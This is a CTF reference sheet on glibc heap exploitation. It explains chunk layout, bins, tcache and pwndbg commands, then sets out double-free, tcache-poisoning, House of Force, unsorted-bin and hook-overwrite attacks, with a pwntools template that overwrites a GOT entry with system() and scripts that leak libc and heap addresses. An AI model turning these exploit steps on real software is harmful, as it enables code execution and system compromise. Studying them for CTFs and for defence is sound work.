heap::pwn

pwn heap · glibc tcache · fastbin
Chunk structBinsTcache pwndbg cmdsVulnsAttacks pwntoolsCTF tips
01Heap Chunk Structure
malloc_chunk layout
/* In memory (64-bit) */
/*  prev_size  (8 bytes) — size of previous chunk if free */
/*  size       (8 bytes) — size of THIS chunk + flags     */
/*  fd         (8 bytes) — forward ptr  (free only)       */
/*  bk         (8 bytes) — backward ptr (free only)       */
/*  fd_nextsize(8 bytes) — largebin only                  */
/*  bk_nextsize(8 bytes) — largebin only                  */
/*  user data  (size - metadata bytes)                     */

/* Size field flags (lowest 3 bits):                       */
A = bit 2   /* NON_MAIN_ARENA: chunk from non-main arena    */
M = bit 1   /* IS_MMAPPED: chunk from mmap()                */
P = bit 0   /* PREV_INUSE: previous chunk is allocated       */

/* malloc() returns pointer to user data (after headers)   */
/* chunk_ptr = user_ptr - 0x10 (subtract 2 * sizeof(size_t))*/

/* Minimum chunk size: 0x20 (32 bytes) on 64-bit           */
/* Chunks always aligned to 0x10 (16-byte alignment)       */
Size calculation
# malloc(n) → chunk size (with header)
python3 -c "
def chunk_size(n):
    # add header (0x10), align to 0x10
    return ((n + 0x10 + 0xf) & ~0xf)
for n in [1, 8, 16, 24, 32, 48, 64, 128, 256]:
    print(f'malloc({n:4}) → chunk 0x{chunk_size(n):03x} ({chunk_size(n)} bytes)')
"

# Key sizes for bin classification (64-bit):
# Fastbin:  0x20 – 0x80  (min–max chunk size)
# Tcache:   0x20 – 0x410 (glibc >= 2.26)
# Smallbin: 0x20 – 0x3f0
# Largebin: >= 0x400
# Unsorted: any freed chunk goes here first
02Bins Reference
All bins at a glance
BinChunk sizes (64-bit)CountStructureKey property
Tcache 2.26+0x20 – 0x4107 per sizeSingly-linked (fd only)Per-thread, no consolidation, fastest
Fastbin0x20 – 0x80unlimitedSingly-linked LIFONo coalescing, stays allocated-ish
UnsortedanyunlimitedDoubly-linkedFreed chunks land here first before sort
Smallbin0x20 – 0x3f062 binsDoubly-linked FIFOExact size match, coalesced
Largebin>= 0x40063 binsDoubly-linked + size-sortedRanges of sizes, best-fit
03Tcache (glibc 2.26+)
Tcache internals
/* tcache_perthread_struct (at start of heap) */
/* counts[64]  — how many chunks in each bin  */
/* entries[64] — singly-linked list heads     */

/* 64 bins, each for a different size          */
/* bin index = (size - 0x20) / 0x10            */
python3 -c "print((0x60 - 0x20) // 0x10)"  # → 4 (bin for 0x60)

/* Max 7 chunks per bin before falling to fastbin/unsorted */
/* tcache_entry: just fd pointer (+ key in glibc >= 2.29)  */

/* glibc 2.29+: key field = tcache_perthread_struct addr   */
/* → double free detected if key matches                   */
/* Bypass: overwrite key to 0 before second free()         */

/* glibc 2.32+: Safe-linking (PROTECT_PTR)                 */
/* stored_fd = real_fd XOR (addr >> 12)                    */
/* Need heap leak to decrypt/forge pointers                */
Tcache poisoning
# Classic tcache dup (glibc < 2.29):
# 1. malloc(0x50) → chunk A
# 2. free(A)      → tcache[0x60].head = A
# 3. free(A)      → A.fd = A (points to itself)
# 4. malloc(0x50) → returns A
# 5. write target_addr into A's fd field
# 6. malloc(0x50) → returns A again
# 7. malloc(0x50) → returns target_addr !

# glibc 2.32+ safe-linking bypass:
python3 -c "
heap_leak = 0x...       # need a heap address
chunk_addr = heap_leak + 0x...
target = 0x404060       # where to write
# stored = target XOR (chunk_addr >> 12)
stored = target ^ (chunk_addr >> 12)
print(hex(stored))      # write this as fd
"
04pwndbg Heap Commands
View heap state
# Overview
heap                  # all allocated chunks
heap -v               # verbose (include free)
heap 0x...addr        # heap in specific arena

# Bins
bins                  # all bins summary
tcache                # tcache bins + counts
fastbins              # fastbin lists
unsortedbin           # unsorted bin
smallbins             # small bins
largebins             # large bins

# Visual
vis_heap_chunks       # color-coded heap map
vis_heap_chunks -n 30 # show 30 chunks

# Chunk at address
malloc_chunk 0x...addr
malloc_chunk -v 0x...addr  # verbose
Arena & libc
# Arena info
arena                 # main_arena struct
arenas                # all arenas
mp                    # malloc_par (heap config)

# Find libc from heap leak
# Unsorted bin: fd/bk → libc main_arena
# main_arena is at fixed offset from libc base
python3 -c "
# leak = fd pointer from unsorted bin chunk
leak = 0x7f1234567890
# main_arena offset varies by libc version
# find with: readelf -s libc.so | grep main_arena
# or: libc.address = leak - libc.sym['main_arena'] - 96
"

# Find tcache struct (heap base + 0x10)
heap              # first chunk shown is tcache
p (tcache_perthread_struct*) heap_base+0x10
05Heap Vulnerabilities
Vulnerability reference
VulnHow it occursWhat you getMitigations
Use-after-free UAFUse pointer after free()Read/write freed chunkDangling ptr checks
Double freefree() same chunk twiceTcache/fastbin dupKey check (2.29+)
Heap overflowWrite past chunk boundaryCorrupt next chunk metadataASAN
Off-by-oneWrite 1 byte past endModify next chunk's P bit or sizeASAN
Null byte overflowOff-by-null (strncpy etc.)Clear P bit → fake prev_size → consolidate
Heap underflowWrite before chunk startCorrupt prev chunk metadata
Type confusionWrong type after reallocInterpret data as wrong struct
06Heap Attacks
House of Force (old, no tcache)
# Overflow wilderness (top chunk) size → 0xffffffff...
# Then request huge allocation to reach target
# Next malloc returns target address

python3 -c "
top_chunk = 0x...          # top chunk address
target    = 0x404060       # where we want malloc to return
# Request size to reach target:
size = target - top_chunk - 0x20
print(hex(size))
"

# Works on glibc without tcache or when:
# - no glibc version check on top chunk size
# - glibc < 2.29 or specific build
Fastbin dup → GOT overwrite
# 1. malloc(0x50) → A, malloc(0x50) → B
# 2. free(A) → free(B) → free(A) again
#    fastbin: A → B → A (cycle)
# 3. malloc(0x50) → A; write &target into A
#    fastbin: B → A → target
# 4. malloc(0x50) → B
# 5. malloc(0x50) → A
# 6. malloc(0x50) → target !

# Fastbin size check: fake chunk at target must have
# correct size field (matching fastbin index)
# Common target: __malloc_hook - 0x23 (size=0x7f trick)
search -8 0x7f   # find 0x7f size byte near __malloc_hook
Unsorted bin attack
# Corrupt unsorted bin bk pointer
# When chunk is sorted: *(bk + 0x10) = unsorted_bin_addr
# → writes main_arena+88 to target+0x10
# Classic: overwrite global_max_fast → enlarge fastbin range

# Tcache stashing (glibc 2.30+):
# Fill tcache, then calloc() bypasses tcache
# Gets chunk from smallbin
# Leftover smallbin chunks go to tcache
# Corrupt bk of smallbin → tcache gets arbitrary addr

# __free_hook / __malloc_hook (glibc < 2.34):
# Write system() to __free_hook
# free(ptr_to_binsh) → system("/bin/sh")
libc.sym['__free_hook']
libc.sym['__malloc_hook']
House of Einherjar / consolidation
# Off-by-null: clear PREV_INUSE bit of next chunk
# Set fake prev_size to point back far
# free(next_chunk) → consolidates backward
# Creates overlapping chunk → write to "freed" memory

# Off-by-one into size field:
# Increment chunk size → chunk overlaps next
# free(enlarged_chunk) → overlapping free region
# Next malloc from that region overlaps allocated data

# Heap feng shui: arrange layout for attack
# Groom heap: alloc/free specific sizes to get
# target chunk adjacent to controlled data
07pwntools Heap Helpers
Tcache poison template
from pwn import *

elf  = ELF('./challenge')
libc = ELF('./libc.so.6')
p    = process('./challenge')

# Helper: alloc / free wrappers (adjust to challenge API)
def alloc(size, data=b''):
    p.sendlineafter(b'> ', b'1')
    p.sendlineafter(b'size: ', str(size).encode())
    if data: p.sendlineafter(b'data: ', data)
    return int(p.recvline())   # chunk index

def free(idx):
    p.sendlineafter(b'> ', b'2')
    p.sendlineafter(b'idx: ', str(idx).encode())

def read(idx):
    p.sendlineafter(b'> ', b'3')
    p.sendlineafter(b'idx: ', str(idx).encode())
    return p.recvline()

# Tcache poison (no safe-linking)
a = alloc(0x50)
b = alloc(0x50)
free(a)
free(b)
free(a)                          # double free — now a→b→a

alloc(0x50, p64(elf.got['puts']))  # write target as fd
alloc(0x50)
alloc(0x50)
alloc(0x50, p64(libc.sym['system']))  # write to GOT
08CTF Tips
Version detection
# Check glibc version on target
strings ./libc.so.6 | grep -i "glibc\|version" | head
ldd --version
# or: strings libc.so | grep "GNU C Library"

# Version-specific features:
# < 2.26: no tcache — fastbin/unsorted attacks
# 2.26-2.28: tcache, no key — easy double free
# 2.29: tcache key — need to clear it
# 2.32: safe-linking — need heap leak
# 2.34: __free_hook/__malloc_hook removed
# 2.35+: tcache_key randomized

# After 2.34: targets for arbitrary write
# _IO_list_all, exit_funcs, setcontext gadget
# dl-resolve, tls_dtor_list, mp_.tcache_bins
Leak strategies
# Libc leak: UAF read on freed unsorted chunk
# → fd/bk point into libc main_arena
a = alloc(0x400)   # large → unsorted bin when freed
alloc(0x20)        # guard chunk (prevent top consolidation)
free(a)
leak = u64(read(a)[:8].ljust(8, b'\x00'))
libc.address = leak - libc.sym['main_arena'] - 96

# Heap leak: UAF read on freed tcache chunk
# glibc < 2.32: fd = next chunk (0 if first)
# glibc 2.32+: fd = PROTECT_PTR(addr, next)
# First chunk in tcache: fd = 0 ^ (addr>>12)
# → leak = stored_fd  → heap = leak << 12
b = alloc(0x20)
free(b)
raw = u64(read(b)[:8].ljust(8, b'\x00'))
heap_base = raw << 12   # approximate
HEAP CHECKLIST →  ① Check glibc version (determines available techniques)  ② vis_heap_chunks after each alloc/free  ③ bins to see current freelist state  ④ UAF read on freed chunk → libc leak (unsorted) or heap leak (tcache)  ⑤ Double free → tcache poison → arbitrary malloc  ⑥ Target: __free_hook (< 2.34) or GOT / tcache metadata  ⑦ Safe-linking (2.32+): need heap leak to forge fd